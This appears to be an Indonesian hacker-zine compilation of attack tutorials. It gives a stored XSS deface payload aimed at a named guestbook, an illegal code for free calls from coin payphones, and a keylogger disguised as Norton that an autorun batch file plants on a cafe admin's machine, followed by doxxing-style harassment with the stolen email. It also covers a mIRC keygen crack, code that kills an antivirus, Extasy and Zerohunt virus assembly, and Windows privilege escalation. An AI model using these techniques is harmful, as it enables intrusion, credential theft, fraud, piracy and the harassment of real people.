sehingga kita bisa merubah seluruh tampilan profile org yg telah mengapprove testi kita..
Buku tamu seti tidak bisa dimasukan data atau input seperti form lain pada umumnya,
mungkin sengaja di off agar tidak ada lagi pesan yang masuk. Akhirnya saya buat sendiri
form yang bisa dimasukan input agar bisa memasukan data ke dalam buku tamu seti. Berikut
langkah2 nya :
Pertama, tulis source berikut dengan teks editor pilihan anda (notepad atau ms word) lalu
simpan dengan nama form.html :
<html><head><title>Deface Form</title></head><body>
<form action="http://www.itmandiri.com/seti/guestbook.php" method="post">
<tr>
<td>Nama</td>
<td>:</td>
<td><input type="text" name="nama" size="20"></td>
</tr>
<br>
<tr>
<td>E-Mail</td>
<td>:</td>
<td><input type="text" name="email" size="30"></td>
</tr><br>
<tr>
<td>Pesan</td>
<td>:</td>
<td><textarea name="pesan" rows="5" cols="30"></textarea></td>
</tr><br>
<input value="Send" type="submit">
<input value="Reset" type="reset">
</form>
</body></html>
Kedua, buka form tersebut dengan browser anda (IE atau modzila. Etc).
Ketiga, isi form layaknya anda akan mengisi buku tamu.
Ke empat, pada form pesan, masukan script berikut :
<div id="Layer1" style="border: 1px none rgb(0, 0, 0); z-index: 1; left: 0px; width: 1000px;
position: absolute; top: 0px; height: 10000px;background-color: #00ff00;">
<center><font color="#0000ff">DefAceD bY : name01less<br>DediCatEd tO : all haCkeR
CreW<br>
DeFacE iS noT hAcKeD</font></center></div>
Isi pesan teragantung dari anda. Silahkan kreasikan sendiri sesuai seni anda.
Setelah itu anda klik send dan lihat sendiri hasil kreatif anda.
15. Hack Telpon Umum Koin Buat Nelpon
Ke Handphone
Suatu ketika gw rindu sama pacar gw yang ada nun jauh di seberang pulau sana, gw pengen
telp ke ponsel dia tapi sayangnya gw lagi nggak punya doku, padahal doi udah ngancem kalo
gw nggak nelepon dia, gw bakal di pecat sebagai administrator di hati dia, hehehe.
Berbekal dari pengalaman dia atas maka gw coba-coba aja ngisengin telepon umum koin
yang ada deket rumah gw, akhirnya dengan sedikit logika dan perasaan yang penuh rasa
rindu akhirnya gw bisa nemuin kode akses illegal supaya gw bisa telepon ke ponsel melalui
telepon umum koin, bingo........
2. abis itu sebelum koin itu masuk ke mesin box penampungan, gw langsung aja neken kode
akses illegal yaitu 52995008 secara cepet dan berirama, jadi loe punya waktu kira-kira 4-5
detik buat neken keseluruhan kode yang pertama tadi
3. setelah kode pertama di teken dengan benar dan di gagang telepon terdengar bunyi
tut.....tut.... tanda panggilan kosong, lalu loe teken lagi kode ke 2 yaitu #2*249 dan diikutin ma
nomor ponsel yang loe tuju.....contohnya #2*249081808000111 secara cepet dan berirama.
4. langkah yang terakhir loe tinggal nunggu tu telepon ke sambung ke nomor ponsel yang loe
tuju dan berdoa nggak ada yang tau apa yang loe lakuin hehehehe, and jangan lupa kalo
telepon da nyambung loe masukin lagi koin ke box telepon, jumlahnya terserah loe,
tergantung lamanya loe mau telepon.
Singkat kata akhirnya kita punya juga yah cara buat nelpon ke handphone tapi dengan tarif
PSTN, lewat telepon koin lagiii........akhir kata bagusnya kita jangan terlalu ngerugiin negara
dengan sering nelepon pake cara kayak gini.....hehehehehe.
Catatan :
Berlaku ke seluruh operator GSM dan CDMA
16. Admin Keok
|---[Table of Content
1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup
[+] Kesimpulan
[+] Referensi
1. Introduction
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini
(walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak
orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share
pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi
artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang
lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar.
Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala
bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui
server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga exploit-exploit
yang dulu dibangga-banggakan oleh kaum newbie menjadi "rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa
menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.
2. Serangan pertama
Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar ente merasa
agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak!
dan salah satunya seperti hal yang banyak diinginkan orang.. mendapatkan password sang
admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus
yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di halaman member kategori
Keyloger.
---[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut:
@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri
nama nav.bat lalu klik tombol [save].
---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan file lain)
sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file
keyloger kamu akan semakin tersamarkan.
---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas
(autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.
Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan
jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TV tanpa
rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada
beliau, "Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong
dikirim ke komputer nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf akan
memproses file nav.bat ---> file nav.bat akan menduplikasi file navw32.exe ke dalam directory
windows dan mengaktivkannya ---> Keyloger telah terinstall, hasil rekamannya akan
tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-lagi) kamu bakalan
senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang
admin? Ikuti langkah-langkah pada serangan kedua.
3. Serangan kedua
Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah secara wajar dan
beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin,
bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti
pengemis di jalanan :) katakan pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah
neeh. Mnurut pesan Error yang muncul, file navw32.dll yang berada di directory windows
hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan
versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan
suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder
Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file
tersebut bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima
kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul
kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar
program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.
4. Hari Pembalasan
Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin sedang
terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya
kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas
menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut.
Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..).
Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah pesan singkat,
memikat dan "mematikan". Berikut contohnya jika milis tersebut berbahasa Indonesia:
Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-
blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!
Dear,
Wanna play "freestyle" with mw? Please call me : 062-021-blablabla
You may F**k me for free!!
Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang
yahuud!! :)
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi
sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan
berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud
pembicaraan yang sudah bisa ditebak apa maksudnya :)
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget
1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang
beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat
beliau sedang sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih terus-terusan
menjerit-jerit dengan jeritan indah :)
5. Pencegahan
Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu
menerima CD dari siapapun selalu tekan-tahan tombol shift sambil memasukkan CD kedalam
CD Room dRive. Setelah CD masuk, tetap tekan tombol shift sampai kira-kira 25 detik.
Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui windows Explorer.
Klik pada area folder tree sebelah kiri, jangan pada daftar drive sebelah kanan karena fitur
autorun akan aktif.
6. Penutup
---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak yang sangat
berbahaya. Ini hanya merupakan contoh Social Engineering sederhana namun berdampak
luar biasa, untuk memancing ide kreatif anda.
---[+ Referensi
Self implementing
Note:
Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar anda brfikir
jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah menolak cinta
anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas. Ada baiknya
anda pergi ke market terdekat untuk membeli seribu cermin. Berkacalah!! perbaiki
penampilan dan perilaku anda!
Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan kecurangan,
menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker, maka anda bisa
membungkam mulut besar mereka dengan cara ini.
17. Keygen
Sori judulnya terlalu mengada-ada, karena sebenarnya sudah jadi rahasia umum, bagaimana
sang cracker mampu memecahkan untaian kode untuk menembus sistem proteksi/keamanan
pada sebuah software, jadi artikel ini hanya ditujukan untuk yang belum pada ngerti aja.
Ini berawal ketika saya membaca salah satu majalah komputer yang baru saya beli, pada
majalah ini saya temukan tulisan kurang lebih seperti berikut : “Bagaimana bisa (mungkin),
kode dan algoritma yang notabene sangat rahasia bagi sebuah produsen aplikasi mampu
dipecahkan oleh sipembuat keygen (cracker)?” (PCMedia edisi 06/2006) , mungkin sebagian
orang akan kebingungan menemukan jawabannya, disini ada 3 kemungkinan mengapa kita
bingung dalam menjawab pertanyaan diatas:
1. Algoritma yang diciptakan oleh sang produsen software bersifat rahasia, dan
tidak mungkin sang produsen menemui sang cracker dirumahnya untuk
memberitahukan algoritma yang baru dia ciptakan.
2. Aplikasi yang dibuat oleh sang produsen sangatlah berharga, pastilah sang
produsen akan memproteksi aplikasinya agar tidak mudah dibajak.
3. Sang penanya tidak pernah menengok dunia bawah tanah (komunitas
underground) seperti Jasakom ini, :-P
Baiklah pertanyaan tersebut akan saya jawab lewat artikel ini.
Baiklah daripada kebanyakan ngomong lebih baik kita mulai tutorial cracking kita.
Cracking Start
Sebelum kita mulai saya harus minta ma‟af dulu pada Khaled Mardam-Bey, karena saya
akan menggunakan aplikasi beliau untuk eksperimen kita kali ini. Untuk contoh saya hanya
akan menjadikan aplikasi mIRC sebagai korban.
Sebenarnya Cheat Engine itu aplikasi untuk mencurangi game dibuat oleh dark_byte,
tapi malah saya salah gunakan untuk cracking.. he.he. karena aplikasi ini sendiri memiliki
bebrapa kelebihan yang tidak dimiliki oleh program debuger lain, seperti stealth untuk
mengatasi sistem proteksi anti debug. Dan yang lebih asik lagi tool ini bisa untuk bypass
password pada beberapa aplikasi securtiy (penulis udah pernah bobol beberapa komputer
temen yang di kunci pake password menggunakan tool ini :-P )
Instal dulu mIRC v6.16, W32Dasm dan Cheat Engine (semua kecuali kalkulator).
Setelah proses instal selesai jalankan mIRC, kamu bakalan ngeliat jendela nag (nag screen)
yang menandakan bahwa aplikasinya masih versi trial 30 hari, dan mengharapkan anda
untuk membelinya.
Klik “Continue”,
Pada jendela “mIRC Options” klik “Cancel”.
Klik menu “Help>Register”.
Nah kamu bisa liat jendela berisi 2 Textbox, satu untuk username dan yang satu untuk
serial number.
Masukkan nama “4NVIe” pada “Full Name” dan masukkan “12345” pada “Registration
Code”.
Klik OK atau tekan Enter, apa yang terjadi ?
“The registration name and number you have entered are not valid. Please make sure
you are entering…bla..bla..bla..”
Tulisan inilah yang muncul, didukung oleh lambang X berwarna merah. Hiks, Tenang
jangan kawatir.
Sekarang jalankan Cheat Engine nya. Maka akan tampak jendela seperti ini :
Klik tombol bergambar komputer di pojok kiri atas, setelah jendela process list terlihat
cari proses bernama “mirc.exe”
Setelah Cheat Engine meng-attach proses „mirc.exe‟ langkah kita selanjutnya adalah
mendebugnya dengan cara mengklik tombol “Memory view” pada Cheat Engine. tampaklah
jendela berikut
Klik menu View>Enumerate Dll‟s and symbol, disitu akan terlihat beberapa symbol dari
“Dynamic Link Library” milik Wind*ws (DLL). Klik pada “USER32” dan carilah fungsi
“GetWindowTextA”, he..he.. pasti sulit karena gak urut pake abjad (itulah kekurangan Cheat
Engine) setelah ketemu dobel klik pada fungsi tsb dan klik “Close”.
Memory Viewer akan menunjukan alamat fungsi tsb. Tekan F5 untuk membuat
breakpoin, klik OK pada jendela registrasi di mIRC, gagal!. Kita coba lagi dengan fungsi lain
“GetDlgItemTextA”, lepaskan dulu breakpoin pada fungsi pertama dengan cara menekan
tombol F5, ngulang cari lagi deh”, setelah membuat breakpoin pada fungsi kedua, isi nama
dan nomor serialnya lagi pada mIRC dan tekan tombol OK. Gagal Lagi!!!, Sial!. Karena
berkali-kali gagal, kita jalankan W32Dasm, Klik menu Disassembly>Open file to
disassembly… cari file mirc.exe pada direktori anda menginstal mIRC. Setelah proses
loading selesai Klik menu “Search>Find text” pada jendela Find, isi teks dengan “Register…”
gak pake tanda kutip (string ini aku temukan pada tubuh exenya yang aku buka pake
ultraedit), Klik “Find Next” 3 kali, tekan “Page Up” 8 kali, hingga tampak :
lea edx, dword ptr [esp+0000010C] kode assembly ini akan memasukkan alamat nomor
serial yang kita masukan tadi ke register EDX.
lea ecx, dword ptr [esp+08] kalo yang ini akan memasukkan alamat nama kita ke register
ECX.
call 004C7400 nah! pemanggilan inilah yang akan mengkalkulasi nama dan nomor yang
kita masukkan dan akan menghasilkan nilai pengembalian pada register EAX, jika
nama/nomor serial valid maka register EAX akan bernilai 1, tapi kalo gak valid maka register
EAX akan bernilai 0 (zero).
test eax, eax cek apakah EAX 0/1.
je 004C766E jika EAX = 0 maka lompat. Kita bisa saja melewati lompatan ini dengan
cara me-NOP nya, tapi dengan cara ini akan merubah CRC dari file eksekutebelnya (crack
kasar), jadi gak bagus, apalagi jika aplikasi yang akan kita crack dilengkapi sistem proteksi
CRC, yang mana program gak akan jalan jika terjadi perubahan CRC!, atau mungkin kita gak
bisa update karena gak pake nomor serial!, jadi kita pake cara kelemubutan aja dengan buat
keygennya.
Lanjut!
Lihat pada alamat 004C7657, karena kita sudah tahu dimana alamat pengecekan nama
dan serial berada, sekarang kita berpindah ke Cheat Engine, pada jendela “Memory Viewer”
klik kanan pada kolom pertama,
Pada popup menu klik “Go to address”, pada jendela “Go to address” masukkan alamat
yang kita dapatkan tadi yaitu “004C7657” tanpa tanda kutip, klik “OK”, maka akan tampak :
Sekarang buat breakpoin pada alamat 004C7657 dengan menekan tombol F5, pindah ke
mIRC, masukkan nama dan nomor serial, klik “OK”, proses berhenti, balik lagi ke Cheat
Engine, trace masuk ke prosedur call 004c7400 dengan cara menekan tombol F7, setelah
masuk coba trace over dengan menekan tombol F8 sampai terlihat
Lea esi, [eax+10] ;masukkan alamat efektif dari nomor serial yang kita masukkan ke ESI
Mov dl, [eax] ;masukkan 1 karakter dari nomor serial ke dl
Inc eax ;eax = eax+1
Test dl, dl ;apakah karakter udah habis?
Jne 004c7518 ;kalo belum lompat ke 004c7518 (looping)
Sub eax, esi ;eax kurangi esi hasilnya eax berisi jumlah karakter dari serial number yang
kita masukkan atau sama dengan perintah VB len(esi)
Cmp eax, ecx ;apakah jumlah karakter
Jae 004c7532 ;lebih dari 4? Jika ya lompat ke 004c7532
Setelah kita trace over sampai sini masuklah ke alamat 004c7532 dengan menekan
tombol F7, setelah masuk kita akan melihat kode berikut :
Mov ebx,[esp+10] ;masukkan alamat efektif tempat nomor serial berada ke EBX, kalo gak
percaya coba trace dulu supaya kode dieksekusi trus klik kanan pada kolom sebelah bawah
dan pada menu popup klik “Goto address”, ketik “ebx” (gak pake kutip) tekan enter, maka
akan terlihat nomor serial yang kita masukin tadi.
He..he..he..., ternyata dugaanku benar lihat pada gambar diatas, itu adalah array! Yang
berisi nomor ajaib, nah!, sekarang kita butuh kalkulatornya Bill untuk meng-convert nilai
heksadesimal ke nilai desimal, (Bill pinjem kalulatornya dong!), pada kalkulator klik Menu
“View>Scientific”, pilih radio button “Hex”, masukkan nilai ajaib dan pindah radio button-nya
ke “Dec” maka kita dapat mengetahui nilai desimalnya:
Konvertasi nilai hex ke dec pada array diatas adalah:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
HEXADECIMAL : 0B 06 11 0C 0C 0E 05 0C 10 0A 0B 06 0E 0E 04 0B 06 0E 0E 04
DECIMAL : 11 6 17 12 12 14 5 12 16 10 11 6 14 14 4 11 6 14 14 4
21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39
HEXADECIMAL : 0B 09 0C 0B 0A 08 0A 0A 10 08 04 06 0A 0C 10 08 0A 04 10
DECIMAL : 11 9 12 11 10 8 10 10 16 8 4 6 10 12 16 08 10 4 16
Ternyata nomor ajaib itu ada 39 buah terangkum dalam tabel array.
Jadi perintah Imul eax, [esp+edx*4+14] sama dengan perintah pada VB :
Asc(Mid$(ESI,X,1)) * NomorAjaib(EDX)
He..he..he.. Algoritma yang sederhana bukan?, oke, makan dulu coklatnya ah...
Sampai sini saya sudah melihat titik terang. Lanjut!
Add ebx,eax ;tambah EBX dengan nilai hasil pengalian pada EAX
Inc edx ;EDX ini adalah counter
cmp edx,26 ;apakah sudah berputar sebanyak 38 kali? (kok 38 bukan 39?, ya karena
array pertama dibaca mulai dari 0)
jle 004c75a3 ;jika kurang atau sama dengan 38 lompat!
Xor edx,edx ;tapi jika udah lebih dari 38 set EDX jadi 0 (balik ke nomor ajaib pertama)
Inc esi ;tambah esi dengan 1 (karakter selanjutnya)
Cmp esi,ecx ;apakah karakter udah habis?
Jnge 004c7590 ;jika belum balik lagi (loop! Sampe karakter habis)
Nah sampe sini pasti kita sudah paham maksud kode diatas, jadi ilustrasinya kira-kira
begini:
Nama -> pisahkan serial jadi dua bagian dengan format 00000-00000 -> kalkulasikan
bagian pertama -> kalkulasikan bagian kedua-> samakan nomor serial yang kita masukkan
dengan hasil kalkulasi pada EBX -> kesimpulan (valid/invalid code).
nah sekarang kita buat key generatornya, mau dibuat pake apa? Tenang jangan panik
dulu aku gak akan buat pake Assembly kok, kita buat pake VB aja yang mudah. Yup!, kita
mulai aja.
Siapkan satu buah TextBox dan satu CommandButton lalu ketikan source code berikut :
-------------------[CUT HERE]-------------------------------------------------
Option Explicit
Huaaahm…. Jam sudah menunjukkan pukul 3.30, akhirnya selesai juga nih artikel.
Dengan cara beginilah saya bisa mengetahui algoritma sistem proteksi pada suatu
aplikasi/software tanpa perlu mengintip/meminta source code pada sang developer!.
18. Antivirus PCMAV LEMAH HACK
Pada bulan Maret ini Majalah PC Media telah membuat program AntiVirus bernama PCMAV
dengan jaminan kepuasan 100% untuk dapat mengatasi Brontok dan variannya secara
akurat dan tuntas baik di memory, registry, file dan folder yang tersebunyi. Apakah anda
sudah mempunyainya ?
Antivirus tersebut menurut saya terlalu digembor-gemborkan seperti tanpa kelemahan sama
sekali. Oke, dengan pengalaman saya selama 13 bulan sebagai programmer (bukan 13
tahun Bo). Saya akan tunjukkan kelemahannya. Kita akan buat suatu program di Visual Basic
6 yang akan membuat program AntiVirus tersebut bertekuk lutut. Selama program ini bekerja,
program antivirus tersebut tidak akan bisa bekerja.
Program ini hanya memerlukan 1 buah form tanpa file modul. Kontrol yang diperlukan hanya
1 buah tombol bercaption Run , dan 1 buah timer berinterval 1000 dan enablednya diset
False.
Private Declare Function SendMessage Lib Saat anda menekan tombol Run maka timer
"user32" Alias "SendMessageA" (ByVal akan bekerja dan captionnya akan berubah
hwnd As Long, ByVal wMsg As Long, menjadi “Stop”. Dalam prosedur Timer dicari
ByVal wParam As Long, lParam As Any) nilai handle window yang nama kelasnya
As Long TMainForm (program antivirus tersebut dibuat
dengan Delphi sehingga nama kelas
Private Const WM_CLOSE = &H10 Windownya TMainForm), setelah di dapatkan
Dim x as Long nilai handle-nya (dalam variable x) maka
program tersebut akan dimatikan dengan
Private Sub Command1_Click() fungsi Windows API SendMessage.
If Command1.Caption = "Run" Then
Timer1.Enabled = True Kode diatas juga bisa digunakan untuk
Command1.Caption = "Stop" mematikan semua program yang dibuat
Else dengan Delphi. Jika ingin lebih spesifik maka
Timer1.Enabled = False kita harus memasukkan nilai captionnya pada
Command1.Caption = "Run" fungsi FindWindow. Untuk program antivirus
End If PC Media caption programnya adalah PCMAV,
End Sub
sehingga yang dimasukkan dalam fungsi
Private Sub Timer1_Timer() FindWindow adalah :
If Second(Now) Mod 5 = 0 Then
x = FindWindow("TMainForm", x = FindWindow("TMainForm", “PCMAV”)
vbNullString)
SendMessage x, WM_CLOSE, 0, 0 Jadi selama nama kelasnya TMainForm dan
End If Captionnya PCMAV maka program antivirus
End Sub tersebut dijamin dalam 5 detik akan langsung
dimatikan. Saran saya tuk pengembang
software antivirus sebaiknya gunakan program C, entah Visual C atau yang sejenisnya,
karena nama kelasnya dapat dengan mudah diatur sehingga dapat menghindar dari prosedur
yang saya sampaikan ini, dan yang kedua hindari penggunaan nilai caption yang tetap, kalo
perlu ikat dengan timer sehingga nilainya berubah-rubah sepanjang waktu. Kayaknya gitu aja
deh yang saya bisa sampaikan tentang satu kelemahan dari Antivirus buatan Lokal supaya
cepat diperbaiki developernya dan pelajaran bagi programmer antivirus lainnya.
19. Virus Assembly
Bagi yang ingin mempelajari bagaimana membuat virus ataupun antivirus, pada kesempatan
kali ini di bagikan source code virus Extacy dan Zero Hunt.
Setidaknya sebagian ilmu dan teknik dapat diambil dari ke2 virus di bawah ini.
go_already_infected:
pop cx
jmp short already_infected
db "EXTASY!"
db "(c) Metal Militia / Immortal Riot"
int21:
cmp ax,4b00
jz kewl
cmp ax,3e00
jnz oops
mov ah,45
int 21
jmp kewl
oops:
jmp chain
infectNOT:
jmp go_already_infected
kewl:
jmp infect
finishinfect:
mov cx,viruslength
mov dx,startload
mov ah,40
int 21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov dx,di
pop cx
int 21
already_infected:
pop dx
pop cx
mov ax,5701h
int 21h
mov ah,3e
int 21
exitinfect:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
chain:
db 0ea
heap:
old21 dw ?, ?
target dw 0ch dup (?)
endheap:
end _small
CSEG SEGMENT
ASSUME CS:CSEG, ES:CSEG, SS:CSEG
org 100h
; Zerohunt virus
; Disassembly by PRiEST
; 4-15-93
Alat biometrik sebagaimana kita ketahui merupakan peralatan tambahan yang digunakan
dengan tujuan menambah tingkat security atau keamanan di suatu wilayah atau tempat. Ada
alat yang berdasarkan identifikasi dari sidik jari / fingerprint, dari bentuk wajah, lekuk di
tangan, selaput pelangi mata (iris), retina mata, suara dan tanda tangan. Dan yang umum
digunakan di Indonesia adalah mode alat biometrik yang menggunakan sidik jari.
Penggunaan alat atau teknologi biometrik ini merupakan bagian dari proses autentikasi yaitu
mengidentifikasikan pengakses / siapa yang akses ?. Selama ini para ahli security terutama
dari para perusahaan yang menciptakan atau membuat produk bimetrik sidik jari ini
mengatakan bahwa untuk mengakali alat ini merupakan hal yang mustahil atau tidak mungkin
terjadi dengan alasan sidik jari merupakan unik artinya semua orang mempunyai sidik jari
yang berbeda dan tidak mungkin bisa sama persis.
Alasan para ahli security tersebut memang benar. Namun bagaimana kalau seandainya
orang yang punya jari tersebut dipotong ? kemudian dibawa ke tempat mesin biometrik sidik
jari tersebut ? Atau orangnya sendiri ditodong kemudian disuruh untuk mengautentikasikan
sendiri ke mesin tersebut ? Namun yang dilakukan oleh seorang profesor matematika adalah
sangat sederhana sekali untuk mengakali mesin biometrik sidik jari ini. Apa yang
dilakukannya dan menjadi berita utama di beberapa media Barat adalah 'Gummi bears defeat
fingerprint sensors'.
Profesor matematika dari Jepang ini, Tsutomu Matsumoto menggunakan gelatin (gel atau
agar-agar) dan cetakan plastik untuk menghasilkan 'gummi' yang berbentuk jari dengan sidik
jarinya ada di gummi tersebut. Dan perbuatannya ini dapat mengakali 11 sistem autentikasi
sidik jari dengan tingkat keberhasilan berhasil 4 kali dari 5 kali usaha atau sekitar 80% tingkat
keberhasilan. Dengan proses yang dilakukan profesor ini kalau ditindak lebih lanjut atau
diproses lebih lanjut, sidik jari yang ditinggalkan seseorang di gelas, bisa dipindahkan dan
dibuat jari palsu dari bahan jelly.
Bahan-bahan yang digunakan oleh profesor Tsutomu ini sangatlah sederhana dan murah.
Tidak diperlukan teknologi tingkat tinggi namun hanyalah kecerdasan dan ingin mencoba.
Dengan bahan yang tidak lebih dari 10 dolar, dia dapat mengakali peralatan canggih dari
optical dengan fitur 'live finger sensor'. Dan uniknya penggunakan jari palsu dari bahan jelly
ini bisa digunakan untuk mengakali sensor yang dijaga oleh seorang penjaga hanya dengan
menempelkan jari palsu jelly ke jari kita sehingga pada saat menekan jari ke alat sensor
tersebut akan tidak terlihat oleh penjaga sekalipun dan sesudahnya bahan tersebut bisa
dimakan untuk menghilangkan bukti !!!.
Ada moral yang bisa kita ambil dari cerita nyata ini bahwa profesor Tsutomu ini bukan ahli
pembuat jari palsu dan dia hanyalah seorang ahli matematika. Dia tidak menggunakan
peralatan canggih dan mahal melainkan hanyalah bahan agar-agar dan plastik saja yang bisa
kita dapatkan di rumah namun berhasil mengakali 11 jenis peralatan sensor sidik jari canggih.
Dengan cara sederhana ini saja bisa mengakali sistem canggih ini berarti para profesosional
lainnya di luar sana bisa melakukan lebih dari itu. Ini membuktikan juga bahwa security
bukanlah hanya semata teknologi saja melainkan suatu perjalanan dan ini sudah diakui oleh
Microsoft sendiri dengan slogan mereka yaitu "Security is a journey not a destination".
21. Admin hack
Anda sering kesal karena tidak bisa masuk ke control panel ? Tidak bisa install program baru
karena system anda diproteksi oleh admin ? Justru kekesalan itulah yang memberikan
dorongan kreatifitas untuk mendapatkan ide meningkatkan permission userid yang kita
gunakan.
Pada artikel ini ditunjukkan bagaimana trik menjadi administrator hanya dengan beberapa
langkah sederhana. Perpaduan teknik hacking, yaitu membuat batch file dan social
engineering (kalo diterjemahkan dalam bahasa sehari-hari artinya “NEPU”)
Hasilnya:
Aha! ternyata account gue udah di daftarin di local acount sama admin gue nih, jadi waktu
gue login domain di PC ini sudah terdaftar juga di local account, entah PANGKAT apa yang
admin kasih ke gue, sebaiknya gue cek dulu deh pake net user, Start > Run > CMD, gue ketik
lagi; net user RISKI
Ternyata bener dugaan gue, si admin cuma ngasih gue PANGKAT Power User, yang udah
pasti punya hak yang sangat terbatas dan minim, terutama buat gue lah! ? sampe sampe gue
gak bisa nginstal program2 kesayangan gue ? hemm…. Tunggu aja luh admin brengsek dan
pelit, tunggu aja tanggal mainnya! He..he..h.e……
Setelah cek & ricek ternyata Win2000 telah di instal sang admin dengan File System FAT32,
huh dasar males mungkin dia formatnya pake Disk Manager kali yak! Yang partisi dan
formatnya sekaligus dan lebih cepet tapi sayangnya gak bisa ngasih file system NTFS yang
sebenarnya encrytpsi datanya jauh lebih bagus dari pada FAT32, kenapa gue bilang begitu?
salah satu contohnya adalah dalam FAT32 seluruh user yang login pada OS tersebut dapat
mengakses setiap profile yang ada di bawah direktori document and settings termasuk
seluruh direktory pada profile sang ADMINISTRATOR ? aha.. lubang kecil yang amat bagus
untuk di exploitasi bukan? Bah bagaimna pula diexploitasinya nih?...
Oke sekarang kita akan mencoba membuat account yang kita punya menjadi account Maha
Dewa ? yaitu administrator dengan memanfaatkan celah kecil yang ada,
1. Pertama kita buat batch file untuk mendaftarkan local account kita untuk dijadikan account
Maha Dewa yaitu ADMINISTRATOR alias sang pengatus semuanya gitu loh!
Kita gunakan command net localgroup, perhatikan batch file di bawah ini
----------------------------------start------------------------------
